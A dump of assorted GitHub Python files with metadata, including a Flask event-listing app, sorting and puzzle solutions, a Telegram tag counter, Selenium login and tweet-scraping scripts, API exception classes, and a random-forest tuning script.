past_shows_db:\n venue = Venue.query.get(show.venue_id)\n past_shows_list.append( {'venue_id': show.venue_id, 'venue_name': venue.name, 'venue_image_link': venue.image_link ,'start_time': show.start_time} )\n # future shows\n future_shows_list = []\n future_shows_db = Show.query.filter(Show.start_time >= datetime.now(), Show.artist_id == artist_id).all()\n for show in future_shows_db:\n venue = Venue.query.get(show.venue_id)\n future_shows_list.append( {'venue_id': show.venue_id, 'venue_name': venue.name, 'venue_image_link': venue.image_link ,'start_time': show.start_time} ) \n data['past_shows'] = past_shows_list\n data['upcoming_shows'] = future_shows_list\n data['past_shows_count'] = len(past_shows_list)\n data['upcoming_shows_count'] = len(future_shows_list)\n return render_template('pages/show_artist.html', artist=data)\n\n# Update\n# ----------------------------------------------------------------\n@app.route('/artists//edit', methods=['GET'])\ndef edit_artist(artist_id):\n # TODO: populate form with fields from artist with ID \n # done.\n data = Artist.query.get(artist_id)\n artist={\n \"id\": data.id,\n \"name\": data.name,\n \"genres\": data.genres.replace('{', '').replace('}', '').split(','),\n \"city\": data.city,\n \"state\": data.state,\n \"phone\": data.phone,\n \"website\": data.website_link,\n \"facebook_link\": data.facebook_link,\n \"seeking_venue\": data.seeking_venue,\n \"seeking_description\": data.seeking_description,\n \"image_link\": data.image_link\n }\n form = ArtistForm(name=data.name,\n city=data.city,\n state=data.state,\n phone=data.phone,\n facebook_link=data.facebook_link,\n website_link=data.website_link,\n image_link=data.image_link,\n seeking_venue=data.seeking_venue,\n seeking_description=data.seeking_description)\n return render_template('forms/edit_artist.html', form=form, artist=artist)\n\n@app.route('/artists//edit', methods=['POST'])\ndef edit_artist_submission(artist_id):\n # TODO: take values from the form submitted, and update existing\n # artist record with ID using the new attributes\n # done.\n try:\n artist = Artist.query.get(artist_id)\n artist.name = request.form['name']\n artist.city =request.form['city']\n artist.state = request.form['state']\n artist.phone = request.form['phone']\n artist.image_link = request.form['image_link']\n artist.facebook_link = request.form['facebook_link']\n artist.genres = request.form.getlist('genres')\n artist.website_link = request.form['website_link']\n artist.seeking_venue = request.form.get('seeking_venue') == 'y'\n artist.seeking_description = request.form['seeking_description']\n db.session.commit() \n # on successful db insert, flash success\n flash('Aritst ' + str(artist_id) + ' was successfully updated!')\n except:\n db.session.rollback()\n flash('An error occurred. Artist ' + str(artist_id) + ' could not be updated.')\n finally:\n db.session.close()\n return redirect(url_for('show_artist', artist_id=artist_id))\n\n@app.route('/venues//edit', methods=['GET'])\ndef edit_venue(venue_id):\n # TODO: populate form with values from venue with ID \n # done.\n data = Venue.query.get(venue_id)\n venue={\n \"id\": data.id,\n \"name\": data.name,\n \"genres\": data.genres.replace('{', '').replace('}', '').split(','),\n \"address\": data.address,\n \"city\": data.city,\n \"state\": data.state,\n \"phone\": data.phone,\n \"website\": data.website_link,\n \"facebook_link\": data.facebook_link,\n \"seeking_talent\": data.seeking_talent,\n \"seeking_description\": data.seeking_description,\n \"image_link\": data.image_link\n }\n form = VenueForm( name=data.name,\n city=data.city,\n state=data.state,\n address=data.address,\n phone=data.phone,\n facebook_link=data.facebook_link,\n website_link=data.website_link,\n image_link=data.image_link,\n seeking_talent=data.seeking_talent,\n seeking_description=data.seeking_description)\n return render_template('forms/edit_venue.html', form=form, venue=venue)\n\n@app.route('/venues//edit', methods=['POST'])\ndef edit_venue_submission(venue_id):\n # TODO: take values from the form submitted, and update existing\n # venue record with ID using the new attributes\n # done.\n try:\n venue = Venue.query.get(venue_id)\n venue.name = request.form['name']\n venue.city =request.form['city']\n venue.state = request.form['state']\n venue.address = request.form['address']\n venue.phone = request.form['phone']\n venue.image_link = request.form['image_link']\n venue.facebook_link = request.form['facebook_link']\n venue.genres = request.form.getlist('genres')\n venue.website_link = request.form['website_link']\n venue.seeking_talent = request.form.get('seeking_talent') == 'y'\n venue.seeking_description = request.form['seeking_description']\n db.session.commit() \n # on successful db insert, flash success\n flash('Venue ' + str(venue_id) + ' was successfully updated!')\n except:\n db.session.rollback()\n flash('An error occurred. Venue ' + str(venue_id) + ' could not be updated.')\n finally:\n db.session.close()\n return redirect(url_for('show_venue', venue_id=venue_id))\n\n# Create Artist\n# ----------------------------------------------------------------\n\n@app.route('/artists/create', methods=['GET'])\ndef create_artist_form():\n form = ArtistForm()\n return render_template('forms/new_artist.html', form=form)\n\n@app.route('/artists/create', methods=['POST'])\ndef create_artist_submission():\n # called upon submitting the new artist listing form\n # TODO: insert form data as a new Venue record in the db, instead\n # TODO: modify data to be the data object returned from db insertion\n\n try: \n artist = Artist(name = request.form['name'],\n city = request.form['city'],\n state = request.form['state'],\n phone = request.form['phone'],\n image_link = request.form['image_link'],\n facebook_link = request.form['facebook_link'],\n genres = request.form.getlist('genres'),\n website_link = request.form['website_link'],\n seeking_venue = request.form.get('seeking_venue') == 'y',\n seeking_description = request.form['seeking_description'] )\n db.session.add(artist)\n db.session.commit() \n # # on successful db insert, flash success\n flash('Artist ' + request.form['name'] + ' was successfully listed!')\n except:\n db.session.rollback()\n flash('An error occurred. Artist ' + request.form['name'] + ' could not be listed.')\n finally:\n db.session.close()\n return render_template('pages/home.html')\n\n\n# Shows\n# ----------------------------------------------------------------\n\n@app.route('/shows')\ndef shows():\n # displays list of shows at /shows\n # TODO: replace with real venues data.\n # done.\n raw_shows = Show.query.all()\n data = []\n for show in raw_shows:\n artist = Artist.query.get(show.artist_id)\n venue = Venue.query.get(show.venue_id)\n data.append( {\"venue_id\": show.venue_id,\n \"venue_name\": venue.name,\n \"artist_id\": show.artist_id,\n \"artist_name\": artist.name,\n \"artist_image_link\": artist.image_link,\n \"start_time\": show.start_time} )\n return render_template('pages/shows.html', shows=data)\n\n@app.route('/shows/create')\ndef create_shows():\n # renders form. do not touch.\n form = ShowForm()\n return render_template('forms/new_show.html', form=form)\n\n@app.route('/shows/create', methods=['POST'])\ndef create_show_submission():\n # called to create new shows in the db, upon submitting new show listing form\n # TODO: insert form data as a new Show record in the db, instead\n # done.\n try:\n show = Show( artist_id = request.form['artist_id'], \n venue_id = request.form['venue_id'], \n start_time = request.form['start_time'] )\n db.session.add(show)\n db.session.commit() \n # on successful db insert, flash success\n flash('Show was successfully listed!')\n except:\n db.session.rollback()\n flash('An error occurred. Show could not be listed.')\n finally:\n db.session.close()\n return render_template('pages/home.html')\n\n@app.errorhandler(404)\ndef not_found_error(error):\n return render_template('errors/404.html'), 404\n\n@app.errorhandler(500)\ndef server_error(error):\n return render_template('errors/500.html'), 500\n\n\nif not app.debug:\n file_handler = FileHandler('error.log')\n file_handler.setFormatter(\n Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')\n )\n app.logger.setLevel(logging.INFO)\n file_handler.setLevel(logging.INFO)\n app.logger.addHandler(file_handler)\n app.logger.info('errors')\n\n#----------------------------------------------------------------------------#\n# Launch.\n#----------------------------------------------------------------------------#\n\n# Default port:\nif __name__ == '__main__':\n app.run()\n\n# Or specify port manually:\n'''\nif __name__ == '__main__':\n port = int(os.environ.get('PORT', 5000))\n app.run(host='0.0.0.0', port=port)\n'''\n","repo_name":"jinjin-liang/nd0044-project1-Fyyur","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":22381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"70965189165","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 11 22:36:45 2018\n\n@author: Das\n\"\"\"\n\ndef Quicksort(arr, l, r):\n if l < r:\n pi = partition(arr, l, r)\n \n arr = Quicksort(arr, l, pi-1)\n arr = Quicksort(arr, pi+1, r)\n return arr\n \ndef partition(a, l, r):\n p = a[r]\n i = l-1\n \n for j in range(l, r):\n if a[j] <= p:\n i+=1\n a[i], a[j] = a[j], a[i]\n a[i+1], a[r] = a[r], a[i+1]\n return i+1\n \n\nprint('Enter numbers to sort separated by space:')\niput = input()\n\na = iput.split()\na = list(map(int, a))\na = Quicksort(a, 0, len(a)-1)\n\nprint(list(range(0, 6)))","repo_name":"dasaprakashk/100daysofcode","sub_path":"Divide and Conquer/Sorting/QuickSort.py","file_name":"QuickSort.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"19104980147","text":"f = open('day2-input.txt','r')\nlines = f.readlines()\nlines = [line.rstrip() for line in lines]\n\nsum = 0\nfor line in lines:\n line = list(line.split(' '))\n if(line[1] == 'Y'): \n sum += 3\n if(line[0] == 'A'): #Rock\n sum += 1\n elif(line[0] == 'B'): #Paper\n sum += 2\n else: #scissors\n sum += 3\n elif(line[1] == 'X'): \n sum += 0\n if(line[0] == 'A'): #Rock\n sum += 3\n elif(line[0] == 'B'): #Paper\n sum += 1\n else: #scissors\n sum += 2\n else: \n sum += 6\n if(line[0] == 'A'): #Rock\n sum += 2\n elif(line[0] == 'B'): #Paper\n sum += 3\n else: #scissors\n sum += 1\n\nprint(sum)\n\nf.close()","repo_name":"bergenmarshall/AdventOfCode2022","sub_path":"day2.py","file_name":"day2.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"2405774954","text":"from Carro import Carro\r\n\r\ncarro1 = Carro(\"Fiat\",\"Strada\",\"2020\",0)\r\n\r\ncarro1.ligar()\r\n\r\n# carro1.acelerar(int(input(\"Informe quanto deseja acelerar: \")))\r\n\r\n# if carro1.verificarMarcha() == False:\r\n# print(\"Baixar velocidade\")\r\n# else:\r\n# print(\"O carro está na \",carro1.verificarMarcha(), \"ª marcha\")\r\n\r\nif carro1.acelerar(int(input(\"Informe quanto deseja acelerar: \"))):\r\n print(\"Acelerou\")\r\nelse:\r\n print(\"Não acelerou\")\r\n ","repo_name":"leoncosta1980/AulasInfinity","sub_path":"Aula 12_06/mainCarro.py","file_name":"mainCarro.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"73197787244","text":"import asyncio\nimport csv\nimport logging\nimport re\nfrom datetime import datetime\nfrom pathlib import Path\n\nfrom telethon import TelegramClient # type: ignore\n\nfrom common import TAG_PATTERN, SESSION_NAME, SYSTEM_VERSION\n\n_log = logging.getLogger(__name__)\n\n\ndef get_tags(channel_name: str,\n api_id: int,\n api_hash: str,\n ):\n client = TelegramClient(SESSION_NAME, api_id, api_hash, system_version=SYSTEM_VERSION)\n client.start()\n\n tags: dict = {}\n\n async def main():\n channel = await client.get_entity(channel_name)\n messages = await client.get_messages(channel, limit=None)\n for msg in messages:\n if msg.text:\n _log.debug(msg.text)\n matches = re.findall(TAG_PATTERN, msg.text)\n for tag in matches:\n tags[tag] = tags.get(tag, 0) + 1\n\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n\n if not tags:\n _log.warning(\"No tags collected, csv will not be created\")\n return\n\n _log.debug(tags)\n write_csv(tags)\n\n\ndef write_csv(tags: dict):\n fieldnames = [\"Tag\", \"Amount\"]\n timestamp = datetime.now().strftime(\"%d_%m_%Y__%H_%M_%S\")\n here = Path(__file__).parents[2].resolve()\n output_folder = here / 'output' / 'tags'\n tags_file = output_folder / f\"{timestamp}_tags.csv\"\n output_folder.mkdir(exist_ok=True, parents=True)\n\n with open(tags_file, 'w', newline='') as csv_file:\n writer = csv.DictWriter(csv_file, fieldnames=fieldnames)\n writer.writeheader()\n for tag in tags:\n writer.writerow({fieldnames[0]: tag, fieldnames[1]: tags[tag]})\n","repo_name":"Cimeta/parser-example","sub_path":"src/parser/tags.py","file_name":"tags.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"30017438594","text":"# -*- coding: utf-8 -*-\n\"\"\"\n##################################################\n#\n# ECP 3004: Python for Business Analytics\n#\n# Name: Songjie Yin\n#\n# Date: 5/3/2021\n# \n##################################################\n#\n# Sample Script for Final Exam: \n# Module with Function Definitions\n#\n##################################################\n\"\"\"\n\n\n\n\"\"\"\n##################################################\n##################################################\n# Note: there should be no printing or calculations\n# in this script, aside from function definitions. \n# Save those for a script that you might call\n# my_midterm_tests.py (but is not graded).\n##################################################\n##################################################\n\"\"\"\n\n\n\n\n\n\n##################################################\n# Import Required Modules\n##################################################\n\n# import name_of_module\nimport math\nimport numpy as np\nfrom scipy.optimize import minimize\n\n##################################################\n# Function Definitions\n##################################################\n\n# Only function definitions here - no other calculations. \n\n# Exercise 1\n\ndef ln_check(x: float, a: float) -> float:\n \"\"\"\n \n Calculates calculates the difference between math.log(x) \n\tand some candidate value a, which is a guess of the value of math.log(x).\n \n >>> ln_check(math.exp(7), 3)\n 4.0\n >>> ln_check(math.exp(9), 4.5)\n 4.5\n >>> ln_check(math.exp(10), 10)\n 0.0\n \n \"\"\"\n ln = math.log(x)\n \n check = ln - a\n \n return check\n\n# Exercise 2\n\ndef calc_e(x_0: float, max_iter: int, tol: float) -> float:\n \"\"\"\n Preconditions: x_0, iter, tol > 0\n \n Calculates the base of the natural logarithm.\n \n >>> calc_e(2, 10, 0.001)\n 2.718281064358138\n >>> calc_e(5,20, 0.001)\n 2.718281828458728\n >>> calc_e(1, 10, 0.1)\n 2.718281064358138\n \n \"\"\"\n x = x_0\n for i in range(max_iter):\n x_next = x-x*ln_check(x, 1)\n if abs(x_next-x) float:\n \"\"\"\n Calculates the sum of squared residuals \n for the linear regression model,\n as a function of the slope coefficient only, \n concentrating out the intercept.\n \n \n >>> SSR_conc(1.0, [3, -3, 3], [1, 1, 1])\n 24.0\n >>> SSR_conc(1.0, [3, 0, 3], [0, 2, 2])\n 12.666666666666666\n >>> SSR_conc(0.5, [2, 3, 4], [1, 2, 3])\n 0.5\n \n \"\"\"\n \n y_bar = sum(y)/len(y)\n x_bar = sum(x)/len(x)\n \n beta_0 = y_bar - (x_bar * beta_1)\n \n ssr = sum((np.array(y) - beta_0 - beta_1*np.array(x))**2)\n \n return ssr\n\n# Exercise 4\n\ndef ols_slope_conc(y: np.ndarray, x: np.ndarray) -> float:\n \"\"\"\n Calculates the estimated slope coefficient \n for the linear regression model,\n by minimizing the concentrated sum of squared resduals, \n which concentrates out the intercept.\n \n >>> ols_slope_conc([2, 1, 2], [1, 0, 1])\n 1.0\n >>> ols_slope_conc([3, 4, 5], [5, 4, 3])\n -1.00000001888464\n >>> ols_slope_conc([2, 1, 0], [1, 1, 0])\n 1.500000003725291\n \n \"\"\"\n \n initial_beta_1 = 1.0\n return minimize(SSR_conc, initial_beta_1, args=(y, x)).x[0]\n\n# Only function definitions above this point. \n\n\n##################################################\n# Test the examples in your docstrings\n##################################################\n\n\n# Question 2: Test using the doctest module. \n\n\n# Make sure to include exampes in your docstrings above\n# with the proper formatting. \n\n# Test all functions with three examples each. \n# One example is already provided. \n\n# Choose good examples that will test interesting cases. \n# Make sure they all work correctly. \n\n\n# Add code so that the tests are implemented below \n# -- but only when the script is run,\n# not when it is imported. \n\nimport doctest\n\nif __name__ == \"__main__\":\n\n doctest.testmod()\n\n\n\n##################################################\n# End\n##################################################\n\n","repo_name":"Kelvin0123/SongjieYin-ECP3004S21","sub_path":"final_exam/my_final_module.py","file_name":"my_final_module.py","file_ext":"py","file_size_in_byte":4138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"30655579223","text":"import unittest\n\nfrom rca.programmes.utils import format_study_mode\n\n\nclass TestFormatStudyMode(unittest.TestCase):\n def test_common_last_word(self):\n study_modes = [\n \"Full-time study\",\n \"Part-time study\",\n ]\n result = format_study_mode(study_modes)\n self.assertEqual(result, \"Full-time or part-time study\")\n\n def test_different_last_word(self):\n study_modes_list = [\n [\n \"Study online\",\n \"Study on campus\",\n ],\n [\n \"Full-time\",\n \"Part-time\",\n ],\n ]\n result1 = format_study_mode(study_modes_list[0])\n self.assertEqual(result1, \"Study online or study on campus\")\n\n result2 = format_study_mode(study_modes_list[1])\n self.assertEqual(result2, \"Full-time or part-time\")\n\n def test_custom_separator(self):\n study_modes = [\n \"Option A\",\n \"Option B\",\n \"Option C\",\n ]\n result = format_study_mode(study_modes, separator=\" / \")\n self.assertEqual(result, \"Option a / option b / option c\")\n","repo_name":"torchbox/rca-wagtail-2019","sub_path":"rca/programmes/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"19"}
+{"seq_id":"74083843882","text":"from panda3d.core import Vec4, Point3\n\nELEVATOR_NORMAL = 0\nELEVATOR_INT = 1\nREJECT_NOREASON = 0\nREJECT_SHUFFLE = 1\nREJECT_NOSEAT = 2\nMAX_GROUP_BOARDING_TIME = 6.0\n\nElevatorData = {ELEVATOR_NORMAL: {'openTime': 2.0,\n 'closeTime': 2.0,\n 'width': 3.5,\n 'countdown': 15.0,\n 'sfxVolume': 1.0,\n 'collRadius': 5},\n ELEVATOR_INT: {'openTime': 2.0,\n 'closeTime': 2.0,\n 'width': 3.5,\n 'countdown': 65.0,\n 'sfxVolume': 1.0,\n 'collRadius': 5}}\n\nTOON_BOARD_ELEVATOR_TIME = 1.0\nTOON_EXIT_ELEVATOR_TIME = 1.0\nTOON_VICTORY_EXIT_TIME = 1.0\nSUIT_HOLD_ELEVATOR_TIME = 1.0\nSUIT_LEAVE_ELEVATOR_TIME = 2.0\nINTERIOR_ELEVATOR_COUNTDOWN_TIME = 90\nLIGHT_OFF_COLOR = Vec4(0.5, 0.5, 0.5, 1.0)\nLIGHT_ON_COLOR = Vec4(1.0, 1.0, 1.0, 1.0)\n\nElevatorPoints = [Point3(-1.5, 5, 0.1), Point3(1.5, 5, 0.1),\n Point3(-2.5, 3, 0.1), Point3(2.5, 3, 0.1)]\n\nElevatorOutPoints = [Point3(-1.5, -5, 0), Point3(1.5, -5, 0),\n Point3(-2.5, -7, 0), Point3(2.5, -7, 0)]\n\nElevatorOutPointsFar = [Point3(-1.5, -5, 0), Point3(1.5, -5, 0),\n Point3(-2.5, -7, 0), Point3(2.5, -7, 0)]\n","repo_name":"Cog-Invasion-Online/cio-src","sub_path":"game/src/coginvasion/cogoffice/ElevatorConstants.py","file_name":"ElevatorConstants.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"19"}
+{"seq_id":"14331276561","text":"class Solution:\n def addBinary(self, a: str, b: str) -> str:\n i = -1\n total = \"\"\n carry = 0\n diff = len(a) - len(b)\n\n if diff > 0:\n b = diff * \"0\" + b\n elif diff < 0:\n a = abs(diff) * \"0\" + a\n\n while abs(i) <= len(a):\n if int(a[i]) + int(b[i]) + carry < 2:\n total = str(int(a[i]) + int(b[i]) + carry) + total\n carry = 0\n elif int(a[i]) + int(b[i]) + carry == 2:\n carry = 1\n total = \"0\" + total\n else:\n carry = 1\n total = \"1\" + total\n i -= 1\n\n if carry:\n total.replace(total[0], \"0\")\n total = \"1\" + total\n\n return total\n","repo_name":"ocan00cemal/LeetCode","sub_path":"67. Add Binary.py","file_name":"67. Add Binary.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"1676480912","text":"import unittest\nfrom selenium import webdriver\nimport xlutils\nfrom xlutilis import ReadData\nfrom selenium.webdriver.common.keys import Keys\nclass Test_001(unittest.TestCase):\n @classmethod\n def setUp(self):\n self.driver=webdriver.Chrome(executable_path=\"C:\\\\Users\\\\DELL\\\\AppData\\\\Local\\\\Programs\\\\Python\\\\Python37\\\\chromedriver.exe\")\n @classmethod\n def tearDown(self):\n self.driver.close()\n\n def test_login_facebook(self):\n self.driver.get(\"https://www.facebook.com/login/\")\n self.driver.find_element_by_xpath(\"//*[@id='email']\").send_keys(\"mskmouni@gmail.com\")\n self.driver.find_element_by_xpath(\"//*[@id='pass']\").send_keys(\"cdsdcdsd\")\n self.driver.find_element_by_xpath(\"//*[@id='loginbutton']\").click()\n title_fb=self.driver.title\n self.assertEqual(\"test_login_facebook\",title_fb,\"title of the page is unmatched\")\n @unittest.skip(\"this is the test not ready yet\")\n def test_redbus(self):\n self.driver.get(\"https://www.redbus.in/\")\n print(self.driver.title)\n @unittest.SkipTest\n def test_opencart(self):\n self.driver.get(\"https://www.opencart.com/\")\n return self.driver.title\n\nif \"__name__\" == \"__main__\":\n unittest.main\n","repo_name":"surmetta143/pythonProject","sub_path":"Test_unit.py","file_name":"Test_unit.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"37749171168","text":"import calendar\nimport datetime\nfrom selenium import webdriver\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\n\ndef getXpath(browser,tweet):\n # use JavaScript execute the code getting XPath\n xpath = browser.execute_script(\"\"\"\n function absoluteXPath(element) {\n var comp, comps = [];\n var parent = null;\n var xpath = '';\n var getPos = function(element) {\n var position = 1, curNode;\n if (element.nodeType == Node.ATTRIBUTE_NODE) {\n return null;\n }\n for (curNode = element.previousSibling; curNode; curNode = curNode.previousSibling) {\n if (curNode.nodeName == element.nodeName) {\n ++position;\n }\n }\n return position;\n };\n while (element) {\n comp = comps[comps.length] = {};\n switch (element.nodeType) {\n case Node.TEXT_NODE:\n comp.name = 'text()';\n break;\n case Node.ATTRIBUTE_NODE:\n comp.name = '@' + element.nodeName;\n break;\n default:\n comp.name = element.nodeName;\n }\n comp.position = getPos(element);\n element = element.parentNode;\n }\n for (var i = comps.length - 1; i >= 0; i--) {\n comp = comps[i];\n xpath += '/' + comp.name;\n if (comp.position !== null) {\n xpath += '[' + comp.position + ']';\n }\n }\n return xpath;\n }\n return absoluteXPath(arguments[0]);\n \"\"\", tweet)\n return xpath\n\ndef splitTime(sinceTime,untilTime):\n #split untilTime-sinceTime by month\n dates = []\n for year in range(sinceTime.year, untilTime.year + 1):\n for month in range(1, 13):\n first_day = datetime.datetime(year, month, 1)\n last_day = calendar.monthrange(year, month)[1]\n dates.append(first_day)\n dates.append(datetime.datetime(year, month, last_day))\n s = dates[0::2]\n e = dates[1::2]\n sinceList = [str(date).split()[0] for date in s]\n untilList = [str(date).split()[0] for date in e]\n return sinceList,untilList\n\ndef scrap(browser,advSearchComand):\n key='[data-testid=\"tweetText\"]'#locating the tweets\n wait = WebDriverWait(browser, 10)\n browser.get(advSearchComand)\n WebDriverWait(browser, 10).until(EC.element_to_be_clickable((By.CSS_SELECTOR, key)))\n collect=[]\n tweets = wait.until(EC.presence_of_all_elements_located((By.CSS_SELECTOR, key)))\n while tweets:\n for tweet in tweets:\n if len(getXpath(browser,tweet))>=210:#过滤被转发微博,被转发微博xpath更长\n continue\n collect.append(tweet.text)\n browser.execute_script(\"arguments[0].scrollIntoView({ behavior: 'auto', block: 'start' });\", tweet)#跳转到最后一条贴文\n time.sleep(5)\n tempTweets = wait.until(EC.presence_of_all_elements_located((By.CSS_SELECTOR, key)))\n tweets=tempTweets[tempTweets.index(tweet)+1:]\n return collect","repo_name":"Jing-XING/TweetCrawler","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"71846888684","text":"from typing import Dict, List, Any\nfrom requests import HTTPError, Response\nfrom urllib.parse import urlparse, parse_qs\nfrom functools import reduce\n\n\nclass CoinMetricsUnauthorizedException(HTTPError):\n \"\"\"\n Raised when a request is made that will return an error due to being unauthorized to flat files server\n \"\"\"\n\n def __init__(self, response: Response, *args: Any, **kwargs: Any):\n if response.status_code not in [401, 403]:\n response.raise_for_status()\n self.response = response\n self.request = response.request\n error_message = \"\"\"The provided API key is not authorized to access the Coin Metrics Flat Files server. This product is separate from the API. If you'd like access granted or believe this is a mistake please contact Coin Metrics support.\n \"\"\"\n self.msg = error_message\n super().__init__(response=response, request=response.request, *args, **kwargs)\n\n def __str__(self) -> str:\n return self.msg\n\n\nclass CoinMetricsClientQueryParamsException(HTTPError):\n \"\"\"\n Raised when a request is made that will return an error due to the logic or contents of the request\n \"\"\"\n\n def __init__(self, response: Response, *args: Any, **kwargs: Any):\n if response.status_code != 414:\n response.raise_for_status()\n parsed_query_params: Dict[str, List[str]] = parse_qs(\n str(urlparse(url=response.request.url).query)\n )\n get_sum_of_lengths = lambda strings: reduce(lambda a, b: a + len(b), strings, 0)\n param_length_dict = {\"Total characters\": 0}\n for param, values in parsed_query_params.items():\n sum_of_param_lengths = get_sum_of_lengths(values)\n param_length_dict[param] = sum_of_param_lengths\n param_length_dict[\"Total characters\"] += sum_of_param_lengths\n exception_message = (\n \"This request failed because the request URL is too long, consider reducing the length \"\n f\"of the params.\\n 414 errors may get returned as total characters in query params exceed 5000\"\n f\"\\nLength of the params provided for reference:\\n {param_length_dict}\"\n )\n self.msg = exception_message\n super().__init__(*args, **kwargs)\n\n def __str__(self) -> str:\n return self.msg\n","repo_name":"coinmetrics/api-client-python","sub_path":"coinmetrics/_exceptions.py","file_name":"_exceptions.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"19"}
+{"seq_id":"70217545644","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Mar 6 10:29:46 2018\r\n\r\n@author: YUBO\r\n\"\"\"\r\nimport pandas as pd\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport scipy as sp\r\nimport sklearn\r\nfrom pandas import Series,DataFrame\r\nfrom sklearn.cross_validation import train_test_split\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.ensemble import ExtraTreesClassifier, RandomForestClassifier,AdaBoostClassifier,GradientBoostingClassifier\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom mlxtend.classifier import StackingCVClassifier\r\nfrom collections import Counter\r\nfrom sklearn.decomposition import PCA\r\nnp.random.seed(0)\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.model_selection import GridSearchCV\r\n#读取测试集\r\ntest_data=pd.read_csv(\"all_test.csv\",header=None)\r\ntest_data=test_data.iloc[0:99998,:]\r\nerror=pd.read_csv(\"error.csv\",header=None)\r\ntest_data=test_data.append(error,ignore_index=True)\r\ntest_data1=test_data.iloc[:,1:]\r\ntest_data1.columns=list(np.arange(2600))\r\n\r\n\r\ndata_train=pd.read_csv(\"partTrainData.csv\",header=None)\r\nmix_data=data_train.iloc[:,0:2600].append(test_data1,ignore_index=True)\r\nmix_data=DataFrame(mix_data)\r\nscale = StandardScaler()\r\nx = scale.fit_transform(mix_data)#数据标准化\r\nx=DataFrame(x)\r\npca = PCA(n_components=50)\r\nx_pca_new=pca.fit_transform(x)#在各主成分投影数据,做主成分得分\r\nx_pca_new=DataFrame(x_pca_new)\r\ntest11=x_pca_new.iloc[48383:,:]\r\ntrain11=x_pca_new.iloc[0:48383,:]\r\ntrain11.loc[:,\"class\"]=data_train.iloc[:,2600]\r\ntrain11_train,train11_test=train_test_split(train11,test_size=0.3)\r\n#参数寻优\r\nresults1 = []\r\n\r\n# 决策树个数参数取值\r\nn_estimators_options=list(range(100,400,5))\r\n\r\nmax_depth_options=list(range(39,55,1))\r\nmin_samples_split_options=list(range(2,50,2))\r\nmax_leaf_nodes_options=list(range(1,50,4))\r\nrandomstate_options=list(range(0,50,2))\r\nmin_samples_leaf_options=list(range(1,40,2))\r\n\r\nfor n_estimators_size in n_estimators_options:\r\n for max_depth_size in max_depth_options:\r\n clf = RandomForestClassifier(max_features=19,min_samples_leaf=8,n_estimators=265,max_depth=50 ,n_jobs=-1,criterion=\"gini\",oob_score=True,class_weight=\"balanced\")\r\n clf.fit(train11_train.iloc[:,0:50],train11_train.iloc[:,50])\r\n q1=clf.predict(train11_test.iloc[:,0:50])\r\n#计算F1得分\r\n score_test = sklearn.metrics.f1_score(train11_test.iloc[:,50], q1, pos_label=list(set(train11_test.iloc[:,50])),average = None)\r\n results1.append((max_depth_size ,np.mean(score_test)))\r\n#输出最佳参数组合\r\nprint(max(results1, key=lambda x:x[1]))\r\nresults2=[]\r\nmax_features_options=list(range(37,51,2))\r\nfor max_features_size in max_features_options:\r\n clf = RandomForestClassifier(max_features=29,min_samples_leaf=8,n_estimators=265,max_depth=50 ,n_jobs=-1,criterion=\"gini\",oob_score=True,class_weight=\"balanced\")\r\n clf.fit(train11_train.iloc[:,0:50],train11_train.iloc[:,50])\r\n q1=clf.predict(train11_test.iloc[:,0:50])\r\n#计算F1得分\r\n score_test = sklearn.metrics.f1_score(train11_test.iloc[:,50], q1, pos_label=list(set(train11_test.iloc[:,50])),average = None)\r\n results2.append((max_features_size ,np.mean(score_test)))\r\n\r\nresults3=[]\r\nmin_samples_leaf_options=list(range(2,30,2))\r\nfor min_samples_leafs in min_samples_leaf_options:\r\n clf = RandomForestClassifier(min_samples_leaf=4,max_features=29,n_estimators=265,max_depth=50 ,n_jobs=-1,criterion=\"gini\",oob_score=True,class_weight=\"balanced\")\r\n clf.fit(train11_train.iloc[:,0:50],train11_train.iloc[:,50])\r\n q1=clf.predict(train11_test.iloc[:,0:50])\r\n#计算F1得分\r\n score_test = sklearn.metrics.f1_score(train11_test.iloc[:,50], q1, pos_label=list(set(train11_test.iloc[:,50])),average = None)\r\n results3.append((min_samples_leafs ,np.mean(score_test)))\r\n \r\nresults1=[]\r\nmin_samples_split_options=list(range(2,100,2))\r\nfor min_samples_splits in 